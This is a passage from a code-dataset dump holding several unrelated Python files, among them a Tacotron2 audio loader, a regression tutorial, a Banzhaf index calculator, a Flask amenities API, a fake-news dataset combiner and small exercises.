6/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619223431","text":"# *****************************************************************************\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the NVIDIA CORPORATION nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# *****************************************************************************\\\n\nimport torch\nimport tacotron2_common.layers as layers\nfrom tacotron2_common.utils import load_wav_to_torch, load_filepaths_and_text, to_gpu\n\n\nclass MelAudioLoader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) computes mel-spectrograms from audio files.\n \"\"\"\n\n def __init__(self, dataset_path, audiopaths_and_text, args):\n self.audiopaths_and_text = load_filepaths_and_text(dataset_path, audiopaths_and_text)\n self.max_wav_value = args.max_wav_value\n self.sampling_rate = args.sampling_rate\n self.stft = layers.TacotronSTFT(\n args.filter_length, args.hop_length, args.win_length,\n args.n_mel_channels, args.sampling_rate, args.mel_fmin,\n args.mel_fmax)\n self.segment_length = args.segment_length\n\n def get_mel_audio_pair(self, filename):\n audio, sampling_rate = load_wav_to_torch(filename)\n\n if sampling_rate != self.stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, self.stft.sampling_rate))\n\n # Take segment\n if audio.size(0) >= self.segment_length:\n max_audio_start = audio.size(0) - self.segment_length\n audio_start = torch.randint(0, max_audio_start + 1, size=(1,)).item()\n audio = audio[audio_start:audio_start+self.segment_length]\n else:\n audio = torch.nn.functional.pad(\n audio, (0, self.segment_length - audio.size(0)), 'constant').data\n\n audio = audio / self.max_wav_value\n audio_norm = audio.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = self.stft.mel_spectrogram(audio_norm)\n melspec = melspec.squeeze(0)\n\n return (melspec, audio, len(audio))\n\n def __getitem__(self, index):\n return self.get_mel_audio_pair(self.audiopaths_and_text[index][0])\n\n def __len__(self):\n return len(self.audiopaths_and_text)\n\n\ndef batch_to_gpu(batch):\n x, y, len_y = batch\n x = to_gpu(x).float()\n y = to_gpu(y).float()\n len_y = to_gpu(torch.sum(len_y))\n return ((x, y), y, len_y)\n","sub_path":"PyTorch/SpeechSynthesis/Tacotron2/waveglow/data_function.py","file_name":"data_function.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"338063905","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 13 12:29:22 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx =[[6],[8],[10],[14],[18]]\r\nprint(x[0])\r\ny = [[7], [9] , [13], [17.5],[18]]\r\n\r\n\r\nplt.figure()\r\nplt.title('Pizza price plotted against diameter')\r\nplt.xlabel('Diameter in inches')\r\nplt.plot(x,y,'m.')\r\nplt.axis([0,25,0,25])\r\nplt.grid(True)\r\nplt.show()\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel = LinearRegression()\r\n\r\nmodel.fit(x,y)\r\nprint('A 13\" pizza should cost: $%.2f ' %model.predict(13)[0])\r\n\r\n#print(model.predict(12))\r\n\r\nMSE=np.mean((15-model.predict(12)[0])**2)\r\nprint('Mean Squared Error %r' %(MSE))\r\n\r\n\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(\"Salary_Data.csv\")\r\n\r\nprint (df)\r\n\r\nx1 = df['Salary']\r\ny1 = df['YearsExperience']\r\n\r\n#print (x1)\r\n#print(y1)\r\n\r\nplt.figure()\r\nplt.title('Salary vs Experience')\r\nplt.ylabel('Salary')\r\nplt.xlabel('Years of experience')\r\nplt.plot(x1,y1,'m.')\r\n#plt.axis([0,25,0,25])\r\nplt.grid(True)\r\nplt.show()\r\n\r\n\r\nfrom sklearn.cross_validation import train_test_split\r\n\r\n\r\n#Y = df['Salary']\r\n#X = df['YearsExperience']\r\nX = df.iloc[:,:-1].values\r\nY = df.iloc[:,1].values\r\n\r\n\r\nX_train, X_test , y_train , y_test = train_test_split(X,Y,test_size=1/6,random_state =0)\r\nprint('y_test')\r\nprint(y_test)\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train,y_train)\r\n\r\ny_pred = regressor.predict(X_test)\r\n\r\nMSE = np.mean((y_test-y_pred)**2)\r\nprint(\"Mean Squared Error %r\" %(MSE))\r\n\r\nplt.scatter(X_train,y_train, color ='red')\r\nplt.plot(X_train,regressor.predict(X_train), color = 'blue')\r\nplt.title('Salary vs Experience (Training Set)')\r\nplt.xlabel('Years of Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\nplt.scatter(X_test,y_test, color ='red')\r\nplt.plot(X_test,regressor.predict(X_test), color = 'blue')\r\nplt.title('Salary vs Experience (Training Set)')\r\nplt.xlabel('Years of Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n","sub_path":"day3/winedecisitiontree.py","file_name":"winedecisitiontree.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"367906777","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# In[4]:\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport random\r\n\r\n\r\n# In[128]:\r\n\r\n\r\nclass Banzhaf0:\r\n \"\"\"\r\n A:邻接矩阵\r\n P:关系概率数组\r\n Prob:投票类型概率矩阵\r\n \"\"\"\r\n def __init__(self,A,P,Prob,m=5,Rdom = False):\r\n self.A = A\r\n self.P = P\r\n self.Prob = Prob\r\n self.Rdom = Rdom\r\n self.m = m\r\n self.A_star = self.float_change()\r\n self.control_point = self.control_find()\r\n\r\n \r\n \r\n def s12(self,x,A0):\r\n \"\"\"\r\n 班扎夫指数计算的前两步\r\n Args:\r\n x: 起始投票情况值\r\n A0: 股权矩阵\r\n Returns: \r\n 返回收敛投票状况,或相互转移的多个投票状况 \r\n \r\n \"\"\"\r\n A = A0\r\n P = self.P\r\n A = np.array(A)*np.array(P)\r\n x0 = x\r\n x1 = x\r\n count = 0\r\n re = []\r\n M = 100\r\n for m in range(M):\r\n count += 1\r\n x0 = x1\r\n x1 = A.dot(x1)\r\n for i,j in enumerate(x1):\r\n if j > 0:\r\n x1[i] = 1\r\n else:\r\n x1[i] = -1\r\n if list(x1) in np.array(re).tolist():\r\n flag = np.array(re).tolist().index(list(x1))\r\n break\r\n re = re + [x1] \r\n return re[flag:]\r\n \r\n def control_find(self):\r\n \"\"\"\r\n 找到源节点\r\n return:源节点编号\r\n \"\"\"\r\n A = self.A_star\r\n Arr = np.array(A)\r\n n = Arr.shape[0]\r\n start = []\r\n end = []\r\n for i in range(n):\r\n for j in range(n):\r\n if Arr[i,j] != 0 and i != j:\r\n start.append(i)\r\n end.append(j)\r\n re1 = []\r\n re2 = []\r\n re1 = self.source(start,end)\r\n re2 = self.main_cir(start,end)\r\n re = list(set(re1)|set(re2))\r\n # self.control_point = re\r\n return re\r\n\r\n def s_all(self,source,target,prob):\r\n \"\"\"\r\n 给出source公司对target公司的班扎夫指数值\r\n Args:\r\n source: 控股公司\r\n target: 被控股公司\r\n prob: 投票类型概率矩阵,长度为2^n的列表\r\n Returns: \r\n 返回source公司对target公司的班扎夫指数值 \r\n \"\"\"\r\n Rdom = self.Rdom\r\n A = self.A_star\r\n control_point = self.control_point\r\n P = self.P\r\n if len(P) < len(A):\r\n P1 = np.ones((len(A)-len(P),len(P)))\r\n P2 = np.ones((len(A),len(A)-len(P)))\r\n P = np.concatenate((np.concatenate((np.array(P),P1),axis=0),P2),axis=1).tolist()\r\n A = np.array(A) * np.array(P) \r\n A = A.T\r\n n = len(A)\r\n k = 2**len(control_point)\r\n re = 0\r\n if Rdom:\r\n y = list(range(k))\r\n i = random.sample(y)\r\n x0 = self.num2binary(i,n)\r\n x0 = np.array(x0)\r\n #print(f'x0:{x0}')\r\n x1 = self.s12(x0,A)\r\n #print(f'x1:{x1}{i}')\r\n for j in range(len(x1)):\r\n print(x1)\r\n if x0[source - 1] == x1[j][target - 1]:\r\n re += 1/len(x1) * prob[i]\r\n # print(f're:{re} x1:{len(x1)}')\r\n # print(f'rev:{re}')\r\n return 2*re - 1\r\n else:\r\n for i in range(k):\r\n x0 = self.num2binary(i,n)\r\n x0 = np.array(x0)\r\n # print(f'x0:{x0}')\r\n x1 = self.s12(x0,A)\r\n #print(f'x1:{x1}{i}')\r\n for j in range(len(x1)):\r\n # print(x1)\r\n if x0[source - 1] == x1[j][target - 1]:\r\n # print(prob[i])\r\n re += 1/len(x1) * prob[i]\r\n # print(f're:{re} x1:{len(x1)}')\r\n # print(f'rev:{re}')\r\n return 2*re - 1\r\n \r\n def source(self,start,left):\r\n re = []\r\n for i in start:\r\n if i not in left:\r\n re.append(i)\r\n return list(set(re))\r\n \r\n def main_cir(self,start,end):\r\n graph = {}\r\n visited = {}\r\n stack = []\r\n num = len(end)\r\n node_l = start\r\n node_r = end\r\n for i in range(num):\r\n n1 = node_l[i]\r\n n2 = node_r[i]\r\n if n1 not in graph:\r\n graph[n1] = [n2]\r\n elif n2 not in graph[n1]:\r\n graph[n1].append(n2)\r\n if n1 not in visited:\r\n visited[n1] = False\r\n if n2 not in visited:\r\n visited[n2] = False\r\n # print(graph)\r\n \r\n re = []\r\n for node in visited.keys():\r\n if not visited[node]:\r\n self.dfs(node, graph, visited, stack,re)\r\n return list(set(re))\r\n \r\n \r\n def dfs(self,node, graph, visited, stack,Circle_set):\r\n visited[node] = True\r\n stack.append(node)\r\n circle_list = []\r\n if node in graph:\r\n for n in graph[node]:\r\n if n not in stack:\r\n if not visited[n]:\r\n self.dfs(n, graph, visited, stack,Circle_set)\r\n else:\r\n index = stack.index(n)\r\n # print('Circle: ')\r\n for i in stack[index:]:\r\n Circle_set.append(i)\r\n # print(f'i:{i}')\r\n #print(f'n:{n}')\r\n circle_set = set(circle_list)\r\n stack.pop(-1) \r\n \r\n \r\n def num2binary(self,num,k): \r\n \"\"\"\r\n 生成第num种投票类型,如[0,0,0]\r\n Args:\r\n num: 表示第num种投票类型,范围为0-2^k-1,类型为整数\r\n k: 表示公司数目\r\n Returns: \r\n 返回一个0-1列表,代表生成的投票类型\r\n \"\"\"\r\n all_point = k\r\n control_point = self.control_point\r\n re = [-1] * len(control_point)\r\n result = [-1] * all_point\r\n i = 0\r\n while num != 0:\r\n re[-i-1] = num % 2\r\n if re[-i-1] == 0:\r\n re[-i-1] = -1\r\n num = num // 2\r\n i += 1\r\n result = np.array(result)\r\n #print(len(re))\r\n #print(len(control_point))\r\n result[control_point] = np.array(re)\r\n return list(result)\r\n \r\n def Banzhaf(self):\r\n \"\"\"\r\n 给出资本系中各个公司的班扎夫指数值\r\n Args:\r\n Returns: \r\n 以一个矩阵的形式给出资本系中各个公司的班扎夫指数值\r\n \"\"\"\r\n \r\n A = self.A\r\n P = self.P\r\n prob = self.Prob\r\n Rdom = self.Rdom\r\n \r\n n = len(A)\r\n \r\n s = np.zeros_like(A)\r\n A_star = self.float_change() \r\n control_point = self.control_find()\r\n prob1 = []\r\n for i in range(len(prob)):\r\n for j in range(2**(len(A)-n)):\r\n prob1.append(prob[i]/(2**(len(A)-n)))\r\n #print(A)\r\n # print(prob1)\r\n for i in range(n):\r\n for j in range(n):\r\n s[i,j] = self.s_all(i+1,j+1,prob1)\r\n return s\r\n \r\n \r\n \r\n def float_change(self):\r\n \"\"\"\r\n 处理缺失数据\r\n :return: 返回经过处理补全后的股权邻接矩阵\r\n \"\"\"\r\n m = self.m\r\n A = self.A\r\n A1 = np.array(A)\r\n stock = np.sum(A1,0)\r\n float_stock = 1 - stock\r\n float_stock = np.around(float_stock,decimals=3)\r\n #print(float_stock)\r\n find = False\r\n for i in range(len(stock)):\r\n #print(float_stock)\r\n if float_stock[i] > min(A1[:,i])+10**(-3):\r\n find = True\r\n break\r\n if find:\r\n A2 = np.zeros((m,len(stock)))\r\n for i in range(len(stock)):\r\n for j in range(m):\r\n A2[j,i] = float_stock[i] / m\r\n A3 = np.zeros((m+len(stock),m))\r\n for i in range(m):\r\n A3[len(stock)+j,j] = 1\r\n A4 = np.concatenate((np.concatenate((A1,A2),axis=0),A3),axis=1)\r\n return A4.tolist()\r\n return A1.tolist()\r\n\r\n\r\n\r\n\r\n","sub_path":"xuqingying/banzhaf_1.py","file_name":"banzhaf_1.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"96685929","text":"#!/usr/bin/python3\n\"\"\"\nA new view for State objects that handles all default RestFul API actions\n\"\"\"\n\nfrom flask import Flask, abort, make_response, jsonify, request\nfrom models import storage\nfrom api.v1.views import app_views\nfrom models.amenity import Amenity\n\n\n@app_views.route('/amenities', methods=['GET'], strict_slashes=False)\ndef get_amenities():\n \"\"\"retrieves the list of all Amenities objects with info about amenities\"\"\"\n amenities = []\n for amenity in storage.all(Amenity).values():\n amenities.append(amenity.to_dict())\n return jsonify(amenities)\n\n\n@app_views.route('/amenities/', methods=['GET'],\n strict_slashes=False)\ndef get_amenity_obj(amenity_id):\n \"\"\"get info about state obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity:\n return jsonify(amenity.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('/amenities/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_amenity_obj(amenity_id):\n \"\"\"delete amenity obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity:\n amenity.delete()\n storage.save()\n return jsonify({}), 200\n else:\n abort(404)\n\n\n@app_views.route('/amenities', methods=['POST'], strict_slashes=False)\ndef create_amenity_obj():\n \"\"\"creates a Amenity\"\"\"\n # request.get_json() - converts the JSON object into Python data\n kwargs = request.get_json()\n if not kwargs:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'name' not in kwargs:\n return make_response(jsonify({'error': 'Missing name'}), 400)\n # obj = class(**kwargs)\n amenity = Amenity(**kwargs)\n amenity.save()\n return make_response(jsonify(amenity.to_dict()), 201)\n\n\n@app_views.route('/amenities/', methods=['PUT'],\n strict_slashes=False)\ndef put_amenity_obj(amenity_id):\n \"\"\"update state obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for key, value in request.get_json().items():\n setattr(amenity, key, value)\n amenity.save()\n return jsonify(amenity.to_dict())\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"385300510","text":"import json\n\nimport pandas as pd\n\nfrom DatasetUtils.SampleCreator import get_sample\nfrom FeatureEngineering.FeatureSelector import get_feature_selection\nfrom Learning.LearningUtils import get_dataset, get_testset\nfrom Preprocessing import Preprocessor\nfrom Utility.CSVUtils import load_data_from_CSV, save_df_as_csv\nfrom Utility.Util import get_root_directory\n\n\ndef join_label_and_group(data):\n \"\"\"\n joins tweet__fake and user__id\n :param data: \n :return: \n \"\"\"\n data_to_join = load_data_from_CSV(get_root_directory()+'/data/data_set_tweet_user_features.csv')\n data_to_join = data_to_join.reset_index(drop=True)\n data = data.reset_index(drop=True)\n data_to_join = data_to_join.reset_index(drop=True)\n\n data_to_join = data_to_join[['tweet__fake', 'user__id']]\n data = pd.concat([data_to_join, data], axis=1)\n print(\"Shape after join: {}\".format(data.shape))\n return data\n\n\ndef load_user_features(testset):\n \"\"\"\n loads user features from database and saves them\n :return: \n \"\"\"\n from Database.DatabaseHandler import DatabaseHandler\n data = DatabaseHandler.get_user_features_df(testset)\n print(data.shape)\n print(data.head())\n if testset:\n save_df_as_csv(data, \"users_testset.csv\")\n else:\n save_df_as_csv(data, \"users_12_07.csv\")\n\n\ndef join_users(testset):\n \"\"\"\n joins a csv file with the users on user ids\n :param testset: \n :return: \n \"\"\"\n if testset:\n user_data = load_data_from_CSV('../FeatureEngineering/users.csv')\n tweet_data = load_data_from_CSV('../FeatureEngineering/data_set_sample_features_final.csv')\n else:\n user_data = load_data_from_CSV('../FeatureEngineering/users.csv')\n tweet_data = load_data_from_CSV('../FeatureEngineering/data_set_sample_features_final.csv')\n\n cols_to_keep = list()\n for col in list(tweet_data.columns):\n if \"tweet__\" in col:\n cols_to_keep.append(col)\n\n tweet_data = tweet_data[cols_to_keep]\n\n print(tweet_data.shape)\n print(user_data.shape)\n\n data = pd.merge(tweet_data, user_data, how='left', left_on=['tweet__user_id'], right_on=['user__id'])\n if testset:\n save_df_as_csv(data, \"testdata/testset_tweet_user_features.csv\")\n else:\n save_df_as_csv(data, \"data_set_tweet_user_features.csv\")\n\n\ndef append_feature(feature_to_append, algo):\n \"\"\"\n appends a feature to a dataset\n :param feature_to_append: \n :param algo: \n :return: \n \"\"\"\n data = get_dataset(algo)\n data = data.reset_index(drop=True)\n\n feature = load_data_from_CSV(\"../data/data_set_tweet_user_features.csv\")[[feature_to_append]]\n\n data = pd.concat([data, feature], 1)\n return data\n\n\ndef append_feature_from_db(feature_to_append):\n \"\"\"\n appends a feature that was stored in the DB to the specified filename\n :param feature_to_append: \n :return: \n \"\"\"\n from Database.DatabaseHandler import DatabaseHandler\n\n data = load_data_from_CSV(\"data_set_tweet_user_features.csv\")\n print(\"drop \" + feature_to_append)\n data = data.drop(feature_to_append, 1)\n print(\"load \" + feature_to_append)\n data['tweet__'+feature_to_append] = data['tweet__id'].map(lambda x: DatabaseHandler.get_feature_by_tweet_id(feature_to_append, x))\n save_df_as_csv(data, \"data_set_tweet_user_features.csv\")\n\n\ndef concat_dfs(data, data_to_join):\n data_to_join = data_to_join.drop('tweet__id', 1)\n\n data = pd.concat([data, data_to_join], axis=1)\n print(data.shape)\n for col in data.columns:\n print(col + \" NaN: \" + str(data[col].isnull().values.any()))\n return data\n\n\ndef combine_data_sets():\n \"\"\"\n combines doc2vec, topic model, tweet and user feature vectors\n :param norm: \n :return: \n \"\"\"\n text_model_vector_dir = get_root_directory()+\"/data/text_data/\"\n topic_vector_dir = get_root_directory()+\"/data/topics_data/\"\n datasets = get_root_directory()+\"/data/\"\n\n doc2vec = dict()\n topics = dict()\n\n doc2vec['nb'] = \"d2v_models_300_0_20.csv\"\n # doc2vec['dt'] = \"d2v_models_200_0_20.csv\"\n doc2vec['dt'] = \"unigram_bow.csv\"\n doc2vec['svm'] = \"d2v_models_300_0_20.csv\"\n doc2vec['nn'] = \"d2v_models_100_0_20.csv\"\n doc2vec['xgb'] = \"d2v_models_300_0_20.csv\"\n # doc2vec['rf'] = \"data_set_300_0_20_d2v.csv\"\n doc2vec['rf'] = \"unigram_bow.csv\"\n\n\n topics['nb'] = \"data_topics_170.csv\"\n topics['dt'] = \"data_topics_170.csv\"\n topics['svm'] = \"data_topics_90.csv\"\n topics['nn'] = \"data_topics_190.csv\"\n topics['xgb'] = \"data_topics_90.csv\"\n topics['rf'] = \"data_topics_200.csv\"\n\n configs = ['nb','dt','nn','svm','xgb','rf']\n for conf in configs:\n text_model_vector = load_data_from_CSV(text_model_vector_dir+doc2vec[conf])\n text_model_vector = text_model_vector.reset_index(drop=True)\n\n tm_cols = [col for col in text_model_vector if 'tweet__id' not in col and 'user__id' not in col and 'tweet__fake' not in col]\n text_model_vector = text_model_vector[tm_cols]\n\n topic_vector = load_data_from_CSV(topic_vector_dir+topics[conf])\n topic_vector = topic_vector.reset_index(drop=True)\n\n data = load_data_from_CSV(get_root_directory()+\"/data/data_set_tweet_user_features.csv\")\n data = Preprocessor.replace_missing_possibly_sensitive(data)\n features = get_feature_selection(data)\n features.extend(['tweet__fake', 'user__id', 'tweet__id'])\n data = data[features]\n data = data.reset_index(drop=True)\n\n data = pd.concat([data, text_model_vector], axis=1)\n data = pd.concat([data, topic_vector], axis=1)\n\n print(data.shape)\n save_df_as_csv(data, datasets+'data_set_'+conf+'.csv')\n\ndef combine_testsets(testset_only=False):\n \"\"\"\n combines doc2vec, topic model, tweet and user feature vectors to build the testset. \n Does not include tweets that are shifted from the training data.\n :param testset_only: True if LDA and Doc2Vec models trained on testdata shoud be used\n :return: \n \"\"\"\n text_model_vector_dir = get_root_directory()+\"/data/text_data/\"\n topic_vector_dir = get_root_directory()+\"/data/topics_data/\"\n datasets = get_root_directory()+\"/data/testdata/\"\n\n doc2vec = dict()\n topics = dict()\n\n if testset_only:\n doc2vec['nb'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['dt'] = \"testset_only_unigram_bow.csv\"\n doc2vec['svm'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['nn'] = \"d2v_models_testset_100_0_20.csv\"\n doc2vec['xgb'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['rf'] = \"testset_only_unigram_bow.csv\"\n\n topics['nb'] = \"data_testset_topics_170.csv\"\n topics['dt'] = \"data_testset_topics_170.csv\"\n topics['svm'] = \"data_testset_topics_90.csv\"\n topics['nn'] = \"data_testset_topics_190.csv\"\n topics['xgb'] = \"data_testset_topics_90.csv\"\n topics['rf'] = \"data_testset_topics_200.csv\"\n else:\n doc2vec['nb'] = \"testset_d2v_300.csv\"\n doc2vec['dt'] = \"testset_unigram_bow.csv\"\n doc2vec['svm'] = \"testset_d2v_300.csv\"\n doc2vec['nn'] = \"testset_d2v_100.csv\"\n doc2vec['xgb'] = \"testset_d2v_300.csv\"\n doc2vec['rf'] = \"testset_unigram_bow.csv\"\n\n clfs = ['nb','dt','nn','svm','xgb','rf']\n\n for clf in clfs:\n text_model_vector = load_data_from_CSV(text_model_vector_dir+doc2vec[clf])\n if testset_only:\n topic_vector = load_data_from_CSV(topic_vector_dir+topics[clf])\n data = load_data_from_CSV(get_root_directory()+\"/data/testdata/testset_tweet_user_features_complete.csv\")\n else:\n topic_vector = load_data_from_CSV(topic_vector_dir+'testset_topics_'+clf+'.csv')\n data = load_data_from_CSV(get_root_directory()+\"/data/testdata/testset_tweet_user_features.csv\")\n data = Preprocessor.replace_missing_possibly_sensitive(data)\n features = get_feature_selection(data)\n features.extend(['tweet__fake', 'user__id', 'tweet__id'])\n data = data[features]\n\n data = pd.concat([data, text_model_vector], axis=1)\n\n # for testset only topics won't be used, because no topics (with large number of topics) could be infered\n if not testset_only:\n data = pd.concat([data, topic_vector], axis=1)\n\n # print(data.index)\n print(data.shape)\n if testset_only:\n save_df_as_csv(data, datasets+'testset_only_'+clf+'.csv')\n else:\n save_df_as_csv(data, datasets+'testset_'+clf+'.csv')\n\n\ndef get_real_news_to_include():\n \"\"\"\n :return: ids that shifted into the testset \n \"\"\"\n with open(get_root_directory()+'/data/testdata/ids_include_in_testset.json') as json_data:\n d = json.load(json_data)\n return d\n\n\ndef append_all_attributes_not_in_data(data, data_with_features):\n \"\"\"\n Appends all attributes from 'data_with_features' which are not contained in 'data' to 'data'.\n Resets index!\n :param data: data to append\n :param data_with_features: data with additional attributes\n :return: \n \"\"\"\n data = data.reset_index(drop=True)\n print(\"data: {}\".format(data.shape))\n\n data_with_features = data.reset_index(drop=True)\n print(\"data_with_features: {}\".format(data.shape))\n\n count = 0\n for col in data_with_features.columns:\n if col not in data_with_features:\n data[col] = data_with_features[col]\n count += 1\n\n print(\"{} attributes appended.\".format(count))\n print(\"new data: {}\".format(data.shape))\n return data\n\ndef build_testset(all, clf_name, keep_all_features=False):\n if clf_name:\n train = get_dataset(clf_name)\n test = get_testset(clf_name)\n else:\n train = load_data_from_CSV(get_root_directory() + \"/data/data_set_tweet_user_features.csv\")\n test = load_data_from_CSV(get_root_directory() + \"/data/testdata/testset_tweet_user_features.csv\")\n\n features_to_extend = ['tweet__id', 'user__id', 'tweet__fake']\n if keep_all_features:\n tmp_features = [col for col in train.columns]\n else:\n tmp_features = get_feature_selection(train, all)\n\n tmp_features.extend(features_to_extend)\n train = train[tmp_features]\n test = test[tmp_features]\n\n ids = get_real_news_to_include()\n to_shift = train[train['tweet__id'].isin(ids)]\n train = train[~train['tweet__id'].isin(ids)]\n print(\"Shape train: {}\".format(train.shape))\n\n test = test.append(to_shift)\n test = test.reset_index(drop=True)\n print(\"Shape test: {}\".format(test.shape))\n return test\n\nif __name__ == \"__main__\":\n\n # load_user_features()\n # join_users()\n\n # combine datasets (tweet/user features, Doc2Vec/BOW, topics) to a dataset for each learner\n # combine_data_sets()\n\n # combine datasets (tweet/user features, Doc2Vec/BOW, topics) to a testset for each learner\n combine_testsets(testset_only=True)\n\n # create testset\n # data = build_testset(0, clf_name=None)\n # save_df_as_csv(data, '../data/testdata/testset_tweet_user_features_complete.csv')\n","sub_path":"DatasetUtils/DataSetCombiner.py","file_name":"DataSetCombiner.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"25215904","text":"# 1부터 n까지의 합 구하기(ch1_sum_n.pyS)\n# 재귀 함수 활용하기\ndef sum_recursive(n):\n # n = 5\n # 5 + 4 + 3 + 2 + 1\n if n <= 1:\n return 1\n \n return n + sum_recursive(n-1)\n\nnumber = int(input('Enter a number sum-recursive: '))\nprint('sum-recursive', sum_recursive(number))\n\n# 숫자 n개 중에 최댓값 찾기(ch2_max.py)\n# 재귀 함수 활용하기\ndef max_recursive(li, idx):\n if (idx == 1): return li[0]\n max = max_recursive(li, idx-1)\n\n if (max > li[idx-1]): return max\n else: return li[idx-1]\n \na = [17,92,18,33,58,7,33,42,99]\nprint('max-recursive', max_recursive(a, len(a)))\n\n# if (idx == 1): return li[0]\n# max = max_recursive(li, idx-1)\n# 위 코드 2줄이, idx가 9->2 까지 재귀적으로 반복\n\n# idx == 2일 때 max 값이 li[0] 즉 17이 할당되고 아래 코드로 넘어감\n# 그리고 거꾸로 지금까지 중첩된 함수가 순차적으로 실행됨\n# idx가 거꾸로 2->9 까지 반복","sub_path":"algorithm/ch4_ex.py","file_name":"ch4_ex.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273071766","text":"#!/usr/bin/python3\n\n\ndef fizzbuzz():\n\n x = 1\n\n while x <= 100:\n if (x % 5) == 0 and (x % 3) == 0:\n print(\"FizzBuzz \", end=\"\")\n\n elif (x % 3) == 0:\n print(\"Fizz \", end=\"\")\n\n elif (x % 5) == 0:\n print(\"Buzz \", end=\"\")\n\n else:\n print(\"{} \".format(x), end=\"\")\n\n x += 1\n","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122620485","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2021/11/7 10:40\r\n# File: 0598.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def maxCount(self, m: int, n: int, ops: List[List[int]]) -> int:\r\n mm = m\r\n nn = n\r\n for a, b in ops:\r\n if a < mm:\r\n mm = a\r\n if b < nn:\r\n nn = b\r\n return mm*nn\r\n","sub_path":"Solutions/0598/0598.py","file_name":"0598.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"205866502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 30 18:28:21 2021\n\n@author: rodrigo\n\"\"\"\n\n\nclass Jogador(object):\n def __init__(self,nome):\n self.name=nome\n self.vitorias=0\n self.derrotas=0\n self.n_tentativas_para_vencer=0\n \n def tenta_nova_letra(self):\n return input(f'{self.retorna_nome_jogador()} digite o teu palpite, uma letra da palavra secreta: ')\n \n def retorna_nome_jogador(self):\n return self.name\n \n def retorna_n_vitorias(self):\n return self.vitorias\n \n def retorna_n_derrotas(self):\n return self.derrotas\n \n def retorna_media_tentativas_para_ganhar(self):\n return self.n_tentativas_para_vencer/self.vitorias\n \n def atualiza_vitoria(self):\n self.vitorias+=1\n \n def atualiza_derrota(self):\n 